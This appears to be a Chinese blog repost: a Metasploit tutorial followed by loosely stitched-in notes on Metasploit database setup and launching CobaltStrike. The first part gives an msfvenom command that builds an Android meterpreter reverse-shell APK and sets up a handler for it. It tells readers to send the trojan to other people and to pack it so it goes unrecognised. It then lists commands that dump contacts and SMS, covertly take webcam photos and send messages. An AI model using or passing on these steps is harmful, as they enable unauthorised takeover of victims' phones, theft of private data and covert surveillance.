msfconsole使用教程

msfconsole使用教程,第1张

众所周知,msf是大家公认的神器!

现在我就来说说到底怎么用msf呢

有很多人说,他们不会安装msfconsole

教程:

http://bbs.huluxia.com/wap/thread/829605.html?para=37Hftt%2B137bfsd%2B037Xfst%2B03p%2FfuN%2By37nftt%2Bw37U%3D%0A&product=tool

安装了msfconsole之后,在termux输入:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 R >/sdcard/mu.apk

其中

LHOST= 后面的数字是本地的ip,不是被攻击者的ip而是你自己的

LPORT= 是端口,高端口不容易被报毒,如果你不知道端口是什么那就不要改了

生成的木马在根目录的mu.apk(啰嗦)

那么接下来,我来教大家怎么监听吧

1.启动msfconsole(漫长):msfconsole

2.使用multi模块:use exploit/multi/handler

3.设置LHOST(跟木马的一样):set LHOST 192.168.2.117

4.设置LPORT(一样的):set LPORT 5555

5.设置payload:set payload android/meterpreter/reverse_tcp

6.启动监听:exploit

最后将木马发给别人就行啦

很多人说一看就知道是木马了!

在这里我说一句,你不会加个壳嘛?

ok!当鱼上吊的时候,会反dshell

命令:

dump_contacts 导出电话

dump_sms 导出信息

webcam_list 列出摄像头

webcam_stream 开启摄像

webcam_snap 偷拍一张照片

webcam_chat 视频通话

ps 列出所有进程

activity_start 启动其它应用

check_root 检查是否root

send_sms 发送指定信息

全部手机进行,免root进行

你这个有很大的可能性是,没有连接metasploit,的数据库,或者该说你根本没有打开,这样的话连不上数据库,他就无法启动,可能你刚开始下载的时候还可以用,后来的时候就不能用了。建议你去再把它的数据库也给安上。

1. 环境及软件

2. 程序安装

旧版安装程序下载地址

https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

1. 使用安装脚本安装MSF

以上下载文件为安装bash脚本,实际为检测配置安装环境,下载安装程序

2. 测试安装完成的MSF

安装完成的MSF目录为/opt/metasploit-framework/

执行msfconsole查看MSF是否正常

出现没有数据库支持警告,首先创建数据库连接配置文件

再次进行启动测试

这种情况一般是数据库服务没有启动或没有初始化

3. 初始化数据库

首先初始化数据库

以上过程完成后,msf再次启动测试正常,数据库连接正常

4. 启动CobaltStrike

上传CobaltStrike V2.5.zip到/root/目录,并解压

启动 cobaltstrike.jar 连接服务端

连接效果如下


欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/sjk/10028310.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-05-04
下一篇2023-05-04

发表评论

登录后才能评论

评论列表(0条)

    保存